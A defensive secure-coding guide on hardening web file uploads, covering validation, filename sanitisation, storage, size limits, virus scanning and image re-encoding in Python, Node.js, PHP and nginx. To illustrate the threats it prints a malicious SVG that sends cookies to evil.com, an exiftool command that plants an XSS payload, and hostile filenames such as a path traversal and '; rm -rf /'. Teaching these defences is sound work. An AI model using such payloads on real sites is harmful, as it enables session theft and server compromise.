File Upload Hardening
Building Securely Without Delay
Web risk is rarely mysterious. It usually comes down to predictable mistakes that persist under time pressure.
File upload hardening reduces that risk with type checking, isolation, scanning, and restricted execution permissions.
That turns security from an afterthought into a standard quality attribute of your product.
Why this matters
The core of file upload hardening is practical risk reduction. Technical context informs which measures you choose, but what counts is that they are actually implemented and embedded in how you build and ship.
Why file uploads are dangerous
An unsecured file upload opens the door to virtually every attack category:
| Attack | Mechanism | Impact |
|---|---|---|
| Malware distribution | Server is used to host and distribute malware | Reputational damage, legal liability |
| Path traversal | Filename contains ../../ to write outside the upload directory | Overwriting configuration files, RCE |
| Denial of Service | Extremely large files or enormous numbers of uploads | Disk space exhausted, service unavailable |
| Stored XSS via SVG | SVG file with embedded <script> tags | Session theft, account takeover |
| Stored XSS via HTML | HTML file with JavaScript, served with text/html | Session theft, phishing |
| EXIF data injection | Metadata in images contains payloads | XSS, SQL injection via metadata parsing |
| XML External Entity | Files with XML structure (SVG, DOCX, XLSX) contain XXE payloads | SSRF, file disclosure |
| Polyglot files | File is simultaneously a valid JPEG and a valid PHP script | Bypass of validation, RCE |
The key question is not whether your upload functionality is vulnerable, but how many layers of defense you have put in place before an attacker reaches the crown jewels.
File type validation
Extension allowlist
Always use an allowlist of permitted extensions, never a blocklist. A blocklist is by definition incomplete: you block .php but forget .phtml, .pht, .php5, .phar, or .shtml.
# Python - extension allowlist
import os
ALLOWED_EXTENSIONS = {'.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx'}
def allowed_file(filename: str) -> bool:
    # Compare the lowercased final extension against the allowlist
    ext = os.path.splitext(filename)[1].lower()
    return ext in ALLOWED_EXTENSIONS
// Node.js - extension allowlist
const path = require('path');
const ALLOWED_EXTENSIONS = new Set(['.jpg', '.jpeg', '.png', '.gif', '.pdf', '.docx']);
function allowedFile(filename) {
  const ext = path.extname(filename).toLowerCase();
  return ALLOWED_EXTENSIONS.has(ext);
}
MIME type validation
The Content-Type header is set by the client and is therefore fundamentally unreliable. An attacker can upload a PHP webshell with Content-Type: image/jpeg. Verify the MIME type server-side based on the file contents:
# Python - server-side MIME detection with python-magic
import magic
def validate_mime(filepath: str, allowed_mimes: set) -> bool:
    mime = magic.from_file(filepath, mime=True)
    return mime in allowed_mimes
ALLOWED_MIMES = {'image/jpeg', 'image/png', 'image/gif', 'application/pdf'}
// Node.js - MIME detection with file-type (works on magic bytes)
import { fileTypeFromFile } from 'file-type';
async function validateMime(filepath, allowedMimes) {
  const result = await fileTypeFromFile(filepath);
  if (!result) return false;
  return allowedMimes.has(result.mime);
}
// PHP - finfo for MIME detection
function validateMime(string $filepath, array $allowedMimes): bool {
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($filepath);
    return in_array($mime, $allowedMimes, true);
}
Magic bytes validation
Magic bytes (file signatures) are the first bytes of a file that identify the format. This is more reliable than extensions or Content-Type headers, but not watertight: polyglot files can have valid magic bytes and still contain malicious code.
| File type | Magic bytes (hex) | Extension | MIME type |
|---|---|---|---|
| JPEG | FF D8 FF | .jpg, .jpeg | image/jpeg |
| PNG | 89 50 4E 47 0D 0A 1A 0A | .png | image/png |
| GIF87a | 47 49 46 38 37 61 | .gif | image/gif |
| GIF89a | 47 49 46 38 39 61 | .gif | image/gif |
| PDF | 25 50 44 46 2D | .pdf | application/pdf |
| ZIP (DOCX/XLSX) | 50 4B 03 04 | .zip, .docx, .xlsx | application/zip |
| RIFF (WebP) | 52 49 46 46, then 57 45 42 50 at offset 8 | .webp | image/webp |
| SVG | 3C 3F 78 6D 6C or 3C 73 76 67 | .svg | image/svg+xml |
# Python - magic bytes validation
MAGIC_BYTES = {
    b'\xff\xd8\xff': 'image/jpeg',
    b'\x89PNG\r\n\x1a\n': 'image/png',
    b'GIF87a': 'image/gif',
    b'GIF89a': 'image/gif',
    b'%PDF-': 'application/pdf',
}
def check_magic_bytes(filepath: str) -> str | None:
    # 8 bytes is enough for the longest signature above (PNG)
    with open(filepath, 'rb') as f:
        header = f.read(8)
    for magic, mime in MAGIC_BYTES.items():
        if header.startswith(magic):
            return mime
    return None
Combined validation
Never rely on a single layer. Combine all three methods:
def validate_upload(filename: str, filepath: str) -> bool:
    # Layer 1: extension
    if not allowed_file(filename):
        return False
    # Layer 2: magic bytes
    detected_type = check_magic_bytes(filepath)
    if detected_type not in ALLOWED_MIMES:
        return False
    # Layer 3: server-side MIME
    if not validate_mime(filepath, ALLOWED_MIMES):
        return False
    return True
Filename sanitization
The original filename of an upload is user input and must be treated as such. Never trust it.
Dangerous filenames
| Attack technique | Example | Risk |
|---|---|---|
| Path traversal | ../../../etc/cron.d/backdoor | Overwriting files outside upload dir |
| Null byte injection | shell.php%00.jpg | Old parsers see .jpg, server executes .php |
| Double extension | document.php.jpg | Depending on server configuration: execution as PHP |
| Unicode tricks | image\u202E\u0067np.php (right-to-left override) | Filename appears as imagephp.png in UI |
| Overlength name | A x 10000 + .jpg | Buffer overflows, filesystem errors |
| Special characters | ; rm -rf / ;.jpg | Command injection with unsafe processing |
| Windows reserved | CON.jpg, NUL.png, AUX.pdf | System errors on Windows servers |
| Dots and spaces | shell.php. or shell.php followed by a trailing space | Windows strips trailing dots/spaces: becomes shell.php |
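The patterns in the table above can be detected mechanically, which is useful for logging and alerting even when the stored name is replaced anyway. The following is a minimal sketch using only the Python standard library; the function name `filename_red_flags`, the flag labels, and the 255-character limit are illustrative assumptions, not part of any library. It is a detection aid, not a sanitizer.

```python
import re
import unicodedata

# Device names that Windows reserves regardless of extension (CON.jpg is still CON).
WINDOWS_RESERVED = {
    "CON", "PRN", "AUX", "NUL",
    *(f"COM{i}" for i in range(1, 10)),
    *(f"LPT{i}" for i in range(1, 10)),
}
MAX_NAME_LENGTH = 255  # assumed limit; a common maximum for one path component


def filename_red_flags(name: str) -> list[str]:
    """Return the reasons a client-supplied filename looks hostile (empty if none)."""
    flags = []
    if "/" in name or "\\" in name or ".." in name:
        flags.append("path traversal")
    if "\x00" in name or "%00" in name:
        flags.append("null byte")
    # Category Cf covers invisible format characters such as U+202E (right-to-left override).
    if any(unicodedata.category(ch) == "Cf" for ch in name):
        flags.append("unicode format character")
    if len(name) > MAX_NAME_LENGTH:
        flags.append("overlength name")
    if re.search(r"[;|&$`<>]", name):
        flags.append("shell metacharacter")
    # Windows matches reserved names on the part before the first dot.
    if name.split(".", 1)[0].strip().upper() in WINDOWS_RESERVED:
        flags.append("windows reserved name")
    core = name.rstrip(". ")
    if core != name:
        flags.append("trailing dot or space")
    if core.count(".") > 1:
        flags.append("multiple extensions")
    return flags
```

For example, `filename_red_flags("photo.jpg")` returns an empty list, while `filename_red_flags("CON.jpg")` returns `["windows reserved name"]`. Legitimate names such as `my.holiday.photo.jpg` also trip the multiple-extensions flag, which is one reason to treat the result as a signal for logging rather than as the sole gate.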
Safe approach: renaming
The safest strategy is to completely ignore the original filename and assign a UUID:
import uuid
import os
def safe_filename(original_filename: str) -> str:
    # Keep only the (allowlisted) extension; the rest of the name is discarded
    ext = os.path.splitext(original_filename)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError(f"Extension not allowed: {ext}")
    return f"{uuid.uuid4().hex}{ext}"
// Node.js
const { randomUUID } = require('crypto');
const path = require('path');
function safeFilename(originalFilename) {
  const ext = path.extname(originalFilename).toLowerCase();
  if (!ALLOWED_EXTENSIONS.has(ext)) {
    throw new Error(`Extension not allowed: ${ext}`);
  }
  return `${randomUUID().replace(/-/g, '')}${ext}`;
}
If you want to preserve the original name (for example for user-friendliness), store it in the database but use the UUID on the filesystem:
# Database: preserve original name, UUID on disk
upload = Upload(
    original_name=secure_filename(file.filename),
    stored_name=safe_filename(file.filename),
    uploaded_by=current_user.id
)
os.path.basename() is not enough
os.path.basename() prevents path traversal but does not protect against double extensions, null bytes, or Unicode tricks. Use it as an additional layer, not as the sole defense:
# Minimum: basename + Werkzeug secure_filename
from werkzeug.utils import secure_filename
name = secure_filename(os.path.basename(uploaded_name))
# Better: UUID + store original name in database
Storage hardening
Store outside the webroot
Rule number one: never store uploads in a directory that is directly served by the web server. If an attacker uploads a webshell to /var/www/html/uploads/, they can call it directly via the browser.
# Wrong: inside webroot
/var/www/html/
├── index.php
└── uploads/ <-- directly accessible via http://site/uploads/
└── shell.php <-- http://site/uploads/shell.php = RCE
# Correct: outside webroot
/var/www/html/
└── index.php
/srv/uploads/ <-- not directly accessible via HTTP
└── a3f8b2c1.jpg
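Storing outside the webroot only helps if every path the application builds really stays inside the storage directory. The sketch below shows one way to check that with `pathlib`; the helper name `resolve_inside_root` is hypothetical, and `/srv/uploads` is simply the directory from the layout above.

```python
from pathlib import Path

UPLOAD_ROOT = Path("/srv/uploads")  # assumed storage root, as in the layout above


def resolve_inside_root(stored_name: str, root: Path = UPLOAD_ROOT) -> Path:
    """Return the absolute path for stored_name, or raise if it leaves root."""
    root_resolved = root.resolve()
    # resolve() collapses ".." segments and follows symlinks before the comparison.
    candidate = (root_resolved / stored_name).resolve()
    if root_resolved not in candidate.parents:
        raise ValueError(f"Path escapes upload root: {stored_name!r}")
    return candidate
```

Calling this immediately before every open, move, or delete keeps the check close to the filesystem operation, so a traversal sequence that slipped past earlier validation still fails here.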
Serve uploads via an application route that enforces access control and content-type headers:
# Flask - serve uploads via application
@app.route('/files/<file_id>')
@login_required
def serve_file(file_id):
    upload = Upload.query.get_or_404(file_id)
    return send_from_directory(
        app.config['UPLOAD_FOLDER'],
        upload.stored_name,
        mimetype=upload.detected_mime,  # No text/html!
        as_attachment=True
    )
Dedicated storage service
Preferably use object storage (S3, GCS, Azure Blob) with pre-signed URLs:
# AWS S3 - pre-signed upload URL
import boto3
s3 = boto3.client('s3')
def generate_upload_url(bucket: str, key: str, expires: int = 300) -> str:
    return s3.generate_presigned_url(
        'put_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ContentType': 'image/jpeg',
        },
        ExpiresIn=expires
    )
# Pre-signed download URL
def generate_download_url(bucket: str, key: str, expires: int = 3600) -> str:
    return s3.generate_presigned_url(
        'get_object',
        Params={
            'Bucket': bucket,
            'Key': key,
            'ResponseContentDisposition': 'attachment',
        },
        ExpiresIn=expires
    )
No execute permissions
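Ensure that uploaded files never carry an execute bit. The directory itself keeps its execute bit, because on a directory that bit only permits traversal:
# Filesystem permissions (750 on the directory: owner rwx, group r-x, others none)
chmod 750 /srv/uploads
chown www-data:www-data /srv/uploads
# No execute bit on files
chmod 640 /srv/uploads/*
Nginx: block execution in upload directory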
# nginx - block script execution in upload location
location /uploads/ {
    # Force download, never execute
    add_header Content-Disposition "attachment" always;
    add_header X-Content-Type-Options "nosniff" always;
    # Explicitly block all script extensions
    location ~* \.(php|phtml|php5|phar|pl|py|cgi|asp|aspx|jsp|sh|bash)$ {
        deny all;
        return 403;
    }
    # No directory listing
    autoindex off;
}
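The web server rule complements the filesystem permissions, and the application can apply those permissions itself at the moment a file is written rather than relying on a later chmod. A minimal sketch, assuming a POSIX system; the helper name `write_upload` is hypothetical and the 0o640 mode mirrors the chmod 640 used for uploaded files.

```python
import os


def write_upload(dest_path: str, data: bytes, mode: int = 0o640) -> None:
    """Create dest_path without execute bits; refuse to overwrite existing files."""
    # O_EXCL makes creation fail if the path already exists, so a name
    # collision can never silently replace an earlier upload.
    fd = os.open(dest_path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    # The process umask can only remove bits from the mode passed to os.open,
    # so set the final mode explicitly once the file is written.
    os.chmod(dest_path, mode)
```

Because the file is created with the restrictive mode from the start, there is no window in which it exists with broader default permissions.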
Separate domain for user content
Serve user-generated content from a separate domain to leverage cookie scope and same-origin policy as a defense layer:
# Main application
app.example.com -> session cookies, CSRF tokens
# User content (separate domain, no cookies from main app)
content.example.com -> uploads, profile images
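If an attacker achieves XSS via an uploaded SVG file on content.example.com, they have no access to cookies from app.example.com, provided those cookies are host-only (set without a Domain=example.com attribute). A completely separate registrable domain removes that caveat.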
Size and quantity limits
Without limits, your upload endpoint is an invitation for Denial of Service.
Server configuration
# nginx - maximum body size
http {
    client_max_body_size 10m;       # Global: max 10 MB
    client_body_timeout 30s;        # Timeout for receiving body
    client_body_buffer_size 128k;
}
# Per location override
location /api/upload {
    client_max_body_size 25m;       # Specific endpoint: max 25 MB
}
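As a defense-in-depth complement to the web server limit, the application can count bytes while it copies an upload to its destination, so the cap still holds if a proxy in front of it is misconfigured. The sketch below is framework-agnostic and uses only the standard library; `copy_with_limit`, `UploadTooLarge`, and the constants are illustrative names, with the 10 MB value taken from the global nginx limit.

```python
import io
from typing import BinaryIO

MAX_UPLOAD_BYTES = 10 * 1024 * 1024  # assumed cap, mirroring the 10 MB nginx limit
CHUNK_SIZE = 64 * 1024               # read in small chunks to keep memory use flat


class UploadTooLarge(Exception):
    """Raised when a stream delivers more bytes than the configured cap."""


def copy_with_limit(src: BinaryIO, dst: BinaryIO, limit: int = MAX_UPLOAD_BYTES) -> int:
    """Copy src to dst, aborting as soon as more than `limit` bytes were read."""
    total = 0
    while True:
        chunk = src.read(CHUNK_SIZE)
        if not chunk:
            return total
        total += len(chunk)
        if total > limit:
            raise UploadTooLarge(f"upload exceeds {limit} bytes")
        dst.write(chunk)


# Usage with in-memory streams standing in for the request body and target file.
copied = copy_with_limit(io.BytesIO(b"x" * 1024), io.BytesIO())
```

The caller remains responsible for deleting the partially written destination file when `UploadTooLarge` is raised.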
Application limits
# Flask - file size limit
app.config['MAX_CONTENT_LENGTH'] = 10 * 1024 * 1024  # 10 MB
@app.errorhandler(413)
def too_large(e):
    return jsonify(error="File too large (max 10 MB)"), 413
// Express + multer - file size and quantity limits
const multer = require('multer');
const path = require('path');
const upload = multer({
  dest: '/srv/uploads/',
  limits: {
    fileSize: 10 * 1024 * 1024, // 10 MB per file
    files: 5,                   // Max 5 files per request
    fields: 10,                 // Max 10 form fields
  },
  fileFilter: (req, file, cb) => {
    const allowed = ['.jpg', '.jpeg', '.png', '.gif', '.pdf'];
    const ext = path.extname(file.originalname).toLowerCase();
    cb(null, allowed.includes(ext));
  }
});
app.post('/upload', upload.array('files', 5), (req, res) => {
  res.json({ uploaded: req.files.length });
});
Rate limiting
# Flask-Limiter - limit uploads per time unit
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
# Keyword arguments avoid depending on positional order, which differs between Flask-Limiter releases
limiter = Limiter(key_func=get_remote_address, app=app)
@app.route('/upload', methods=['POST'])
@limiter.limit("10/hour")   # Max 10 uploads per hour per IP
@limiter.limit("3/minute")  # Max 3 per minute
def upload_file():
    ...
Antivirus scanning
Scan every uploaded file for malware before it is stored or made available.
ClamAV integration
# Install ClamAV and start daemon
sudo apt install clamav clamav-daemon
sudo freshclam  # Signature update
sudo systemctl start clamav-daemon
# Python - scanning with pyclamd
import os
import shutil
import pyclamd
class VirusScanner:
    def __init__(self):
        self.cd = pyclamd.ClamdUnixSocket('/var/run/clamav/clamd.ctl')
        if not self.cd.ping():
            raise RuntimeError("ClamAV daemon not reachable")
    def scan_file(self, filepath: str) -> tuple[bool, str | None]:
        """Returns (is_clean, threat_name)."""
        result = self.cd.scan_file(filepath)
        if result is None:
            return True, None
        # result = {'/path/to/file': ('FOUND', 'Eicar-Test-Signature')}
        status, threat = list(result.values())[0]
        return False, threat
# Usage in upload handler
scanner = VirusScanner()
@app.route('/upload', methods=['POST'])
def upload():
    file = request.files['file']
    temp_path = os.path.join('/tmp', safe_filename(file.filename))
    file.save(temp_path)
    is_clean, threat = scanner.scan_file(temp_path)
    if not is_clean:
        os.remove(temp_path)
        app.logger.warning(f"Malware detected: {threat}")
        return jsonify(error="File rejected by virus scanner"), 400
    # File is clean, move to permanent storage
    final_path = os.path.join(app.config['UPLOAD_FOLDER'], os.path.basename(temp_path))
    shutil.move(temp_path, final_path)
    return jsonify(status="ok"), 201
Note: antivirus scanning is an additional layer, not a replacement for file type validation. AV scanners miss zero-day payloads and custom malware.
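The handler above rejects any non-empty scan result, which is the safe default. It can still be useful to tell a real detection apart from a scanner failure so the two are logged differently. The sketch below is a pure function over the result shape shown in the code comment above; the name `interpret_scan` is hypothetical, and treating any status other than 'FOUND' as a scanner error is an assumption about the daemon's replies, not documented pyclamd behavior.

```python
from typing import Optional, Tuple


def interpret_scan(result: Optional[dict]) -> Tuple[bool, Optional[str]]:
    """Map a clamd-style scan result to (is_clean, reason), failing closed."""
    if result is None:
        # Assumed convention from the example above: None means nothing was found.
        return True, None
    if not result:
        return False, "scan error: empty result"
    status, detail = next(iter(result.values()))
    if status == "FOUND":
        return False, f"malware: {detail}"
    # Any other status is treated as a failed scan, never as a clean file.
    return False, f"scan error: {detail}"
```

With this split, a detection can trigger a security alert while a scan error triggers an operational one, and in both cases the file is kept out of permanent storage.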
Image-specific risks
SVG with embedded JavaScript
SVG is XML and can contain arbitrary JavaScript:
<!-- Malicious SVG -->
<svg xmlns="http://www.w3.org/2000/svg">
  <script>document.location='https://evil.com/?c='+document.cookie</script>
  <rect width="100" height="100" fill="red"/>
</svg>
Defense: never serve SVG with Content-Type: image/svg+xml if it is user-uploaded content. Use Content-Disposition: attachment or convert to a raster format.
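One way to apply this defense consistently is to compute the response headers in a single place. The sketch below is an illustration, not a complete policy: `download_headers` and `ACTIVE_CONTENT_TYPES` are hypothetical names, the set of types is an assumed starting point, and the stored name is assumed to be the server-generated UUID-style name rather than anything the client supplied.

```python
import re

# MIME types a browser may render with script execution; downgraded to a
# generic binary type when served. The exact set here is an assumption.
ACTIVE_CONTENT_TYPES = {
    "image/svg+xml",
    "text/html",
    "application/xhtml+xml",
    "text/xml",
    "application/xml",
}


def download_headers(detected_mime: str, stored_name: str) -> dict[str, str]:
    """Build response headers that force a download and disable MIME sniffing."""
    # Only server-generated names (alphanumerics plus one extension) are accepted,
    # so the value can be placed in the header without further escaping.
    if not re.fullmatch(r"[A-Za-z0-9]+\.[a-z0-9]+", stored_name):
        raise ValueError("stored_name must be a server-generated name")
    if detected_mime in ACTIVE_CONTENT_TYPES:
        content_type = "application/octet-stream"
    else:
        content_type = detected_mime
    return {
        "Content-Type": content_type,
        "Content-Disposition": f'attachment; filename="{stored_name}"',
        "X-Content-Type-Options": "nosniff",
    }
```

An uploaded SVG then leaves the server as `application/octet-stream` with an attachment disposition, so the browser saves it instead of rendering it in the site's origin.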
EXIF data with payloads
EXIF metadata in JPEG files can contain XSS payloads or SQL injection strings that are triggered when the application parses metadata and displays it without encoding:
# Payload in EXIF Comment field
exiftool -Comment='<script>alert(document.cookie)</script>' photo.jpg
Image re-encoding as defense
By re-encoding images you remove embedded scripts, EXIF data, and polyglot constructs:
# Python - strip EXIF and re-encode with Pillow
from PIL import Image
def sanitize_image(input_path: str, output_path: str, max_size: tuple = (4096, 4096)):
    """Re-encode image: strips EXIF, removes embedded content."""
    with Image.open(input_path) as img:
        # Verify that it is actually an image
        img.verify()
    # Reopen after verify (verify makes object unusable)
    with Image.open(input_path) as img:
        # Convert to RGB (removes alpha-channel tricks)
        if img.mode not in ('RGB', 'L'):
            img = img.convert('RGB')
        # Limit dimensions
        img.thumbnail(max_size, Image.LANCZOS)
        # Save without EXIF data
        img.save(output_path, format='JPEG', quality=85, exif=b'')
// Node.js - re-encode with sharp
const sharp = require('sharp');
async function sanitizeImage(inputPath, outputPath) {
  await sharp(inputPath)
    .rotate() // Auto-rotate based on EXIF, then strip
    .resize(4096, 4096, {
      fit: 'inside',
      withoutEnlargement: true
    })
    .removeAlpha()
    .jpeg({ quality: 85 })
    .toFile(outputPath);
}
Content-Security-Policy for uploads
Add a strict CSP to responses for user-uploaded content:
@app.after_request
def add_upload_csp(response):
    if request.path.startswith('/files/'):
        response.headers['Content-Security-Policy'] = (
            "default-src 'none'; "
            "style-src 'none'; "
            "script-src 'none'; "
            "object-src 'none'"
        )
        response.headers['X-Content-Type-Options'] = 'nosniff'
    return response
It is always a delight to see how applications handle file uploads. "The user can upload a profile photo here," says the product owner, with full confidence that users will obediently pick a 200x200 JPEG. Meanwhile you have just built a direct pipeline from the public internet to your server's filesystem, protected by exactly zero layers of validation and an extension blocklist that contains .exe and .bat but forgot .php.
Because yes, who uploads a PHP file as a profile photo? Only everyone who wants to take over your application. But no worries -- the Content-Type header says image/jpeg, so it must be safe. That header is after all set by... the attacker. The same type of logic as a nightclub that asks visitors to write their own age on a note. "He wrote 21, let him through." And to top it all off we store everything nicely in /var/www/html/uploads/, directly accessible and executable via the browser, because that saves us configuring a proxy route. Security by convenience.
Common mistakes
| # | Mistake | Why it is dangerous | Solution |
|---|---|---|---|
| 1 | Extension check only | Trivially bypassed by renaming | Combine with magic bytes and MIME detection |
| 2 | Blocklist instead of allowlist | You always forget an extension (.phtml, .phar, .shtml) | Use a strict allowlist |
| 3 | Trusting the Content-Type header | Set by the client, fully manipulable | Server-side detection with libmagic/file-type |
| 4 | Storage in webroot | Direct execution of uploaded script | Store outside webroot, serve via application |
| 5 | Keeping the original filename | Path traversal, double extensions, Unicode tricks | UUID renaming, original name in database |
| 6 | No size limit | DoS through large uploads | Configure max on web server and application |
| 7 | No rate limiting | Brute force upload, disk space exhaustion | Limit per IP per time unit |
| 8 | Allowing SVG without sanitization | Embedded JavaScript, XSS | Block SVG or convert to raster |
| 9 | Passing EXIF data to frontend | XSS via metadata fields | Strip EXIF, re-encode images |
| 10 | No antivirus scanning | Malware distribution via your platform | Integrate ClamAV or similar scanner |
| 11 | No Content-Disposition header | Browser renders file instead of downloading | Always attachment for user content |
| 12 | Same domain for app and uploads | XSS in upload has access to session cookies | Use a separate content domain |
Checklist
| Priority | Measure | Implementation |
|---|---|---|
| CRITICAL | Extension allowlist | Code: only accept explicitly permitted extensions |
| CRITICAL | Magic bytes validation | Code: python-magic, file-type, finfo |
| CRITICAL | Storage outside webroot | Infrastructure: separate directory, serve via app route |
| CRITICAL | Filename sanitization | Code: UUID renaming, original name in database |
| HIGH | Size limits | Web server: client_max_body_size; App: MAX_CONTENT_LENGTH |
| HIGH | Remove execute permissions | Infrastructure: chmod, nginx location block |
| HIGH | Content-Disposition header | Code/web server: attachment for all user uploads |
| HIGH | X-Content-Type-Options: nosniff | Code/web server: prevent MIME sniffing by browser |
| HIGH | Image re-encoding | Code: Pillow/sharp for strip EXIF + re-encode |
| MEDIUM | Antivirus scanning | Infrastructure: ClamAV daemon + pyclamd integration |
| MEDIUM | Rate limiting | Code: Flask-Limiter, express-rate-limit |
| MEDIUM | Separate content domain | Infrastructure: content.example.com for user uploads |
| MEDIUM | CSP on upload responses | Code: strict Content-Security-Policy header |
| LOW | Pre-signed URLs (S3/GCS) | Infrastructure: object storage with temporary URLs |
| LOW | SVG-to-raster conversion | Code: Pillow/sharp/Inkscape for SVG sanitization |
Summary -- File upload hardening requires a defense-in-depth strategy. No single measure is sufficient on its own: an allowlist on extensions is bypassed by polyglot files, magic bytes validation misses custom payloads, and antivirus scanning does not catch zero-days. The combination of strict file type validation (extension + magic bytes + MIME), filename sanitization (UUID renaming), secure storage (outside webroot, without execute permissions, separate domain), size and rate limits, antivirus scanning, and image re-encoding together form a robust defense. Treat every upload as potentially malicious -- because it is, until proven otherwise.
In the next chapter we cover OAuth 2.0 and OpenID Connect -- how to securely delegate authentication and authorization to identity providers, and which mistakes you absolutely must avoid.
Further reading in the knowledge base
These articles in the portal provide more background and practical context:
- APIs -- the invisible glue of the internet
- SSL/TLS -- why that padlock in your browser matters
- Encryption -- the art of making things unreadable
- Password hashing -- how websites store your password
- Penetration tests vs. vulnerability scans